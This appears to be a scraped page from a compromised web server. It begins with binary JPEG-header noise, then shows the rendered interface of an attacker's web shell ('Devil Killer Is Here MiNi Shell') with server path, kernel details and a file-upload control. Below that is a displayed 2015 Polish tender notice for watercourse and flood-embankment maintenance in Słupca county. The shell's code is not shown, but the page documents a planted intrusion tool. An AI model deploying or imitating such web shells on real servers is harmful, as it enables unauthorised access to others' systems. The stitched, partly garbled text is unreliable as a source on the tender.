JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150907/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150907/232036-N-2015.html

<p class="kh_header"><b>Konin: Utrzymanie śródlądowych płynących wód powierzchniowych na terenie powiatu słupeckiego w 2015 r.
OBIEKT NR 2</b><br>
<b>Numer ogłoszenia: 232036 - 2015; data zamieszczenia: 07.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wielkopolski Zarząd Melioracji i Urządzeń Wodnych w Poznaniu Rejonowy Oddział w Koninie , ul. Okólna 59, 62-510 Konin, woj. wielkopolskie, tel. 63 2421075, faks 63 2432083.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wzmiuw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie śródlądowych płynących wód powierzchniowych na terenie powiatu słupeckiego w 2015 r.
OBIEKT NR 2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót związanych z utrzymaniem (konserwacją) w należytym stanie technicznym śródlądowych wód powierzchniowych.
Zamówienie obejmuje następujące zadania:
Zadanie Nr 1 - Kanał B (Struga Grabienicka B) - 4,38 km
 Kanał B (Struga Grabienicka B) swój początek posiada we wsi Świątniki, gm. Rzgów. Kanał B to główny ciek odprowadzający wody powierzchniowe z polderu VI. Górny odcinek kanału dodatkowo przejmuje spływ wód z polderu VII poprzez syfon pod Czarną Strugą Defet. Kanał B posiada ujście do rz. Warty w km 374,1. Do konserwacji przyjęto odcinek w miejscowościach: Oleśnica Folwark, Olchowo, Kopojno i Tarszewo gm. Zagórów.
Na cieku w km 1+900-5+175, 5+250-5+655, 6+055-6+755 przewidziano następujące roboty:
-	ręczne wykoszenie porostów ze skarp cieku w km 1+900-5+175, 5+250-5+655, 6+055-6+755,
-	wygrabienie wykoszonych porostów km j.w.,
-	mechaniczne odmulenie dna cieku warstwą do 10 cm w km 1+900-3+200, 3+300-5+175,
-	mechaniczne plantowanie urobku koparko-spycharką 508 m3,
-	usuwanie namułu z cieku warstwą 10 cm w km 3+200 - 3+300,
-	hakowanie przy zarośnięciu powierzchni lustra wody do 60% lokalnie w km 5+250-5+655, 6+055-6+755,
-	ręczne ścinanie krzewów rosnących na skarpie cieku na powierzchni 0,20 ha,
-	rozdrobnienie wyciętych gałęzi i krzewów rębarką z powierzchni 0,20 ha,
-	pokrycie pomostu kładki syfonu od strony DW kratami pomostowymi plastikowymi h = 50 mm  (2 szt. 1,6 m x 1,2 m) wraz z zabezpieczeniem przed kradzieżą.

Zadanie Nr 2 - Sucha Rzeka - 19,500 km
Sucha Rzeka - wypływa z gruntów wsi Stara Olszyna, gm. Ostrowite. Jest odbiornikiem wód z przyległych, zmeliorowanych gruntów. Wpada do rz. Meszna w miejscowości Wierzbno na terenie gm. Słupca jako jej lewy dopływ. Do konserwacji przyjęto cały odcinek cieku w km 0+000 - 19+500 w miejscowościach Gółkowo, Wierzbno, Kowalewo Góry, Kowalewo Opactwo, Wola Koszucka Parcele, Cienin Zaborny, Perze, Cienin Kościelny, Pokoje, Pępocin, Żelazków gm. Słupca oraz m. Stara Olszyna gm. Ostrowite.
Na cieku w km 0+000 - 19+500 przewidziano następujące roboty:
-	ręczne wykoszenie porostów ze skarp cieku w km 0+000 - 19+500,
-	wygrabienie wykoszonych porostów,
-	hakowanie przy zarośnięciu pow. lustra wody do 30% lokalnie w km 4+035 - 14+000 na dług. 4983 m, 
-	hakowanie przy zarośnięciu pow. lustra wody do 60% w km 0+000 - 4+035 oraz lokalnie w km 4+035 - 14+000 na długości 4982 m,
-	hakowanie przy zarośnięciu powierzchni lustra wody powyżej 60% w km 14+000 - 16+700,
-	mechaniczne odmulenie dna cieku warstwą do 10 cm, szer. dna 1,2 m w km 16+700 -17+400,
-	mechaniczne odmulenie dna cieku warstwą do 10 cm, szer. dna 0,6 m w km 17+400 -19+500,
-	mechaniczne plantowanie urobku koparko-spycharką 210 m3,
-	usuwanie namułu z cieku warstwą 10 cm lokalnie w km 0+000 - 16+700 na długości 1500 mb,
-	ręczne ścinanie krzewów rosnących na skarpie cieku na powierzchni 0,30 ha,
-	rozdrobnienie wyciętych gałęzi i krzewów rębarką z powierzchni 0,30 ha,
-	wykonanie z brzegu podwójnych opasek z kiszek faszynowych o śr. 20+20 cm - 20 m,
-	rozkopanie uszkodzonej skarpy oraz przerzut gruntu w miejsce uszkodzenia - 3 m3,
-	zakup gruntu wraz z transportem w miejsce wbudowania - 3 m3,
-	zagęszczenie nasypów ubijakami mechanicznymi (ubijakiem spalinowym) - 3 m3,
-	plantowanie (obrobienie na czysto) pow. skarp i dna wykopów wykonywanych mechanicznie - 20 m2,
-	obsianie skarp w ziemi urodzajnej - 20 m2.

Zadanie Nr 3 - Bawół - 6,625 km
Bawół - wypływa z gruntów wsi Kamionka, gm. Witkowo. Następnie przepływa przez gm. Strzałkowo i Słupca. Wpada do rzeki Meszny jako jej prawy dopływ. Całkowita długość cieku wynosi 34,8 km w tym na terenie Powiatu Słupca 20,175 km. Do konserwacji bieżącej przewidziano całą długość cieku znajdujący się na terenie wsi Staw, Brudzewo gm. Strzałkowo.
Na cieku w km 13+550 - 20+175 przewidziano następujące roboty:
-	ręczne wykoszenie porostów ze skarp cieku w km 13+550 - 20+175,
-	wygrabienie wykoszonych porostów ze skarp (80 % wykoszonych porostów),
-	hakowanie rzeki koparką gąsienicową o wysięgniku min 8 m w km 13+550 - 20+175 z pow. 15862,5 m2,
-	mechaniczne odmulenie dna cieku warstwą 10 cm, szer. dna 2,0 m lokalnie na długości 200 m,
-	mechaniczne plantowanie urobku koparko-spycharką 100 m3,
-	hakowanie przy zarośnięciu pow. lustra wody do 30% lokalnie w km 13+550 -20+175 z pow. 700 m2.

Zadanie Nr 4 - Kanał Czarnobrodzki - naprawa skarp i remont budowli 8 szt.
Kanał Czarnobrodzki - jest lewobrzeżnym dopływem Czarnej Strugi Defet i łączy się z nią poniżej miejscowości Mariantów. Obydwa cieki leżą w zlewni rzeki Warty.
Kanał Czarnobrodzki przepływa przez teren trzech powiatów: słupecki, koniński i pleszewski.
Na terenie powiatu słupeckiego znajduje się 6,90 km (km 0+000 - 6+900)
Do konserwacji przyjęto naprawę skarp cieku oraz remont budowli (stopień wodny,  przepusty z piętrzeniem, zastawki) w miejscowościach: Mariantów, Łazy, Michalinów, Łazińsk II gm. Zagórów.
Na cieku przewidziano następujące roboty:
Naprawa umocnień skarp w km 0+530 - 0+620:
-	ręczne zdjęcie gruntu z powierzchni płyt - 250 m2,
-	usuwanie namułu z cieku warstwą 10 cm na długości 100 mb,
-	remont cząstkowy skarp i dna cieków umocnionych prefabrykowanymi płytami betonowymi i żelbetowymi - płyty ażurowe 90x60x6 cm - 306 m2,
-	zabetonowanie otworów płyt ażurowych na skarpach - 0,68 m2,
-	wykonanie palisady z kołków faszynowych - 5,10 m,
-	wykonanie pojedynczych opasek z kiszek faszynowych o średnicy 20 cm - 180 m,
-	umocnienie kiszki faszynowej oraz płyt ażurowych włókniną - 354 m2,
-	obsianie skarp w ziemi urodzajnej - 306 m2,
Remont przepustu z piętrzeniem - PP3
-	rozbiórka ręczna konstrukcji betonowych wylotu przepustu - 0,8 m3,
-	czyszczenie powierzchni betonowych strumieniowe wodne wysokociśnieniowe (przyczółki, filar, kładka wlotu przepustu) - 9,70 m2,
-	zbrojenie  wylotu przepustu - 60 kg,
-	wykonanie elementu żelbetowego - wylot przepustu - 0,8 m3,
-	wykonanie podwójnych opasek z kiszek faszynowych o średnicy 20+20 cm - 20 m,
-	remont powierzchni betonowych i żelbetowych - 9,7 m2,
-	umocnienie kiszki włókniną - 18 m2,
- 	czyszczenie przez szczotkowanie ręczne elementów metalowych przepustu - 13,94 m2,
-	malowanie pędzlem konstrukcji farbą chlorokauczukową (koloru ciemnoniebieskiego) wraz z odnowieniem numeracji budowli - 13,94 m2.
Remont stopnia wodnego - ST4
-	wykonanie palisady z kołków faszynowych - 4 m,
-	wykonanie podwójnych opasek z kiszek faszynowych o średnicy 20+20 cm - 10 m,
-	wykonanie pojedyńczych opasek z kiszek faszynowych o średnicy 20 cm - 10 m,
-	umocnienie kiszki i narzutu kamiennego włókniną - 26 m2,
-	zakup gruntu wraz z transportem w miejsce wbudowania - 10 m3,
-	zagęszczenie nasypów ubijakami mechanicznymi (ubijakiem spalinowym) - 10 m3,
-	plantowanie (obrobienie na czysto) powierzchni skarp i dna wykopów wykonywanych mechanicznie - 60m2,
-	wykonanie narzutu kamiennego na skarpach oraz w dnie - 5,4 m3,
-	obsianie skarp w ziemi urodzajnej - 20 m2.
Remont przepustu z piętrzeniem - PP5
-	czyszczenie powierzchni betonowych strumieniowe wodne wysokociśnieniowe (przyczółki, filar, kładka wlotu i wylotu przepustu) - 16,83 m2,
-	remont powierzchni betonowych i żelbetowych - 16,8 m2,
-	wykonanie podwójnych opasek z kiszek faszynowych o średnicy 20+20 cm - 20 m,
-	umocnienie kiszki włókniną - 28 m2,
-	zakup gruntu wraz z transportem w miejsce wbudowania - 2 m3,
-	wykonanie narzutu kamiennego na skarpach oraz w dnie - 5,4 m3,
-	wykonanie palisady z kołków faszynowych - 4 m,
-	plantowanie (obrobienie na czysto) pow. skarp i dna wykopów wykonywanych mechanicznie - 10 m2,
-	obsianie skarp w ziemi urodzajnej - 10 m2,
- 	czyszczenie przez szczotkowanie ręczne elementów metalowych przepustu - 13,94 m2,
-	malowanie pędzlem konstrukcji farbą chlorokauczukową (koloru ciemnoniebieskiego) wraz z odnowieniem numeracji budowli - 13,94 m2.
Remont zastawki - Z6
-	czyszczenie powierzchni betonowych strumieniowe wodne wysokociśnieniowe (przyczółki wlotu i wylotu zastawki) - 20,25 m2,
-	remont powierzchni betonowych i żelbetowych - 20,2 m2,
-	wykonanie podwójnych opasek z kiszek faszynowych o średnicy 20+20 cm - 40 m,
-	umocnienie kiszki i narzutu włókniną - 60 m2,
-	zakup gruntu wraz z transportem w miejsce wbudowania - 15 m3,
-	zagęszczenie nasypów ubijakami mechanicznymi (ubijakiem spalinowym) - 15 m3,
-	wykonanie narzutu kamiennego na skarpach oraz w dnie - 9,6 m3,
-	wykonanie palisady z kołków faszynowych - 4 m,
- 	czyszczenie przez szczotkowanie ręczne elementów metalowych przepustu - 7,97 m2,
-	malowanie pędzlem konstrukcji farbą chlorokauczukową (koloru ciemnoniebieskiego) wraz z odnowieniem numeracji budowli - 7,97 m2.
Remont przepustu z piętrzeniem - PP7
-	rozbiórka ręczna konstrukcji betonowych wylotu przepustu - 0,8 m3,
-	czyszczenie powierzchni betonowych strumieniowe wodne wysokociśnieniowe (przyczółki, filar, kładka wlotu przepustu) - 9,70 m2,
-	zbrojenie  wylotu przepustu - 60 kg,
-	wykonanie elementu żelbetowego - wylot przepustu - 0,8 m3,
-	wykonanie podwójnych opasek z kiszek faszynowych o średnicy 20+20 cm - 30 m,
-	wykonanie pojedynczych opasek z kiszek faszynowych o średnicy 20 cm - 20 m,
-	remont powierzchni betonowych i żelbetowych - 9,7 m2,
-	umocnienie kiszki włókniną - 61 m2,
-	wykonanie narzutu kamiennego na skarpach oraz w dnie - 7,26 m3,
- 	czyszczenie przez szczotkowanie ręczne elementów metalowych przepustu - 13,94 m2,
-	malowanie pędzlem konstrukcji farbą chlorokauczukową (koloru ciemnoniebieskiego) wraz z odnowieniem numeracji budowli - 13,94 m2.
Remont zastawki - Z8
-	czyszczenie powierzchni betonowych strumieniowe wodne wysokociśnieniowe (przyczółki wlotu i wylotu zastawki) - 20,25 m2,
-	remont powierzchni betonowych i żelbetowych - 20,2 m2,
-	wykonanie podwójnych opasek z kiszek faszynowych o średnicy 20+20 cm - 20 m,
-	umocnienie kiszki i narzutu włókniną - 38 m2,
-	wykonanie narzutu kamiennego na skarpach oraz w dnie - 8,25 m3,
-	wykonanie palisady z kołków faszynowych - 4 m,
- 	czyszczenie przez szczotkowanie ręczne elementów metalowych przepustu - 7,97 m2,
-	malowanie pędzlem konstrukcji farbą chlorokauczukową (koloru ciemnoniebieskiego) wraz z odnowieniem numeracji budowli - 7,97 m2.
Remont przepustu z piętrzeniem w km 4+465
-	rozbiórka ręczna konstrukcji betonowych wylot i wlot przepustu - 2,2 m3,
-	roboty remontowe. Wymiana rur żelbetowych (rury ułożone na podbudowie suchego betonu) - 14 m (pozycja uwzględnia zakup nowych rur żelbetowych),
-	zbrojenie wylotu i wlotu przepustu wraz z montażem prowadnic na szandory - 120 kg,
-	wykonanie elementu żelbetowego - wylot i wlot przepustu - 2,2 m3,
-	wykonanie podwójnych opasek z kiszek faszynowych o średnicy 20+20 cm - 60 m,
-	zakup gruntu wraz z transportem w miejsce wbudowania - 15 m3,
-	zagęszczenie nasypów ubijakami mechanicznymi (ubijakiem spalinowym) - 15 m3,
-	plantowanie (obrobienie na czysto) powierzchni skarp i dna wykopów wykonywanych mechanicznie - 60m2,
-	obsianie skarp w ziemi urodzajnej - 45 m2.
Remont przepustu z piętrzeniem - PP9
-	rozbiórka ręczna konstrukcji betonowych wlotu i wylotu przepustu - 2,2 m3,
-	roboty remontowe. Wymiana rur żelbetowych (rury ułożone na podbudowie suchego betonu) - 4 m (rury betonowe z odzysku),
-	zbrojenie  wylotu przepustu - 120 kg,
-	wykonanie elementu żelbetowego - wylot i wlot przepustu - 2,2 m3,
-	osadzenie prowadnic zamknięcia na wlocie przepustu z pierzeniem - 4,0 m,
-	wykonanie podwójnych opasek z kiszek faszynowych o średnicy 20+20 cm - 20 m,
-	wykonanie pojedynczych opasek z kiszek faszynowych o średnicy 20 cm - 10 m,
-	umocnienie kiszki i narzutu włókniną - 45 m2,
-	wykonanie narzutu kamiennego na skarpach oraz w dnie - 8,4 m3,
- 	czyszczenie przez szczotkowanie ręczne elementów metalowych przepustu - 13,94 m2,
-	malowanie pędzlem konstrukcji farbą chlorokauczukową (koloru ciemnoniebieskiego) wraz z odnowieniem numeracji budowli - 13,94 m2,
-	drobne roboty ślusarskie, naprawa uszczelnienia zasuw - 2 szt.

Zadanie Nr 5 - prawostronny wał p.powodziowy rz. Warty - podwyższenie korony wału
Wał zlokalizowany w km rz. Warty od 377,0 do 385,1.W korpusie wału znajdują się trzy przepusty wałowe 
w km 377,0 (o 0,6 m), km 377,9 (o 1,2 m) i w km 381,4 (o 0,6 m). Całkowita długość wału wynosi 7384 mb.
Wał bezpośrednio chroni polder V - Lądek o pow. 475 ha.
Przewidziano remont wału polegający na podwyższeniu korony wału oraz przejazdów wałowych 
w miejscach stwierdzonych podczas opracowania oceny pięcioletniej wykonanej przez biuro projektów BIPROWODMEL Sp. z o.o. Poznań w listopadzie 2012 r. dla Polderu Lądek.
Roboty będą polegały na:
-	roboty pomiarowe przy liniowych robotach ziemnych wraz z wykonaniem dokumentacji powykonawczej - 1,64 km,
-	wykopy oraz przekopy wykonywane na odkład koparkami podsiębiernymi, zdjęcie humusu z darniną z korony wału oraz załadunek humusu na samochód dostawczy - 544 m3,
-	transport lądowy gruntu ciągnikiem kołowym z przyczepą. Załadunek mechaniczny koparką wyładunek ręczny - 50 t, + 1 dodatek na łączną odległość 1 km,
-	orka gleby glebogryzarką przyczepną, rozdrobnienie humusu - 0,49 ha,
-	humusowanie skarp i korony wału z obsianiem przy grubości humusu 5 cm (humus z odzysku) - 6432 m2,
-	transport humusu z Polderu Lądek na wał lewostronny rz. Warty Polder Zagórów na odległość ok. 10 km samochodem dostawczym do 5 t - 168 t,
-	zagęszczenie nasypów zagęszczarkami, Zagęszczenie skarpy wału - 45 m3,
-	zakup gruntu wraz z transportem w miejsce wbudowania - 789 m3,
-	nasypy wykonywane koparkami zgarniakowymi 0,6 m3 z bezpośrednim przerzutem gruntu (przerzut piasku 
i humusu) - 930,5 m3, 
-	zagęszczenie nasypów walcami samojezdnymi wibracyjnymi 13 t - 990,5 m3,
-	profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni, wykonywane mechanicznie, przy użyciu walca statycznego, przejazdy wałowe 5 szt. - 542 m2,
-	górna warstwa przy nawierzchniach z kamienia tłuczonego, grubość warstwy po uwałowaniu 15 cm, przejazdy wałowe 5 szt. - 542 m2..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.24.64.00-7, 45.24.40.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 61.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten spełnią wykonawcy, którzy  wykonali należycie co najmniej jedną robotę  budowlaną z zakresu melioracji wodnych podstawowych, regulacji rzek lub polegającej na budowie, odbudowie, rozbudowie lub przebudowie budowli hydrotechnicznych  (w rozumieniu Rozporządzenia Ministra Środowiska z dnia 20 kwietnia 2007 r. w sprawie warunków technicznych, jakim powinny odpowiadać budowle hydrotechniczne i ich usytuowanie Dz. U. Nr 86, poz. 579) o wartości minimum 100 tys. zł brutto (słownie: sto tysięcy) 
w okresie ostatnich 5 lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - 
w tym okresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten spełnią Wykonawcy, którzy dysponują co najmniej jedną osobą posiadającą odpowiednie do rodzaju przewidywanych robót budowlanych uprawnienia budowlane w specjalności konstrukcyjno-budowlanej, hydrotechnicznej lub melioracje wodne lub budownictwo wodne do pełnienia samodzielnych funkcji 
w budownictwie, a osoby te posiadają aktualne zaświadczenia o przynależności do izby inżynierów, o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2013 r. poz. 1409).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 500.000 zł (pięćset tysięcy złotych i 00/100).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

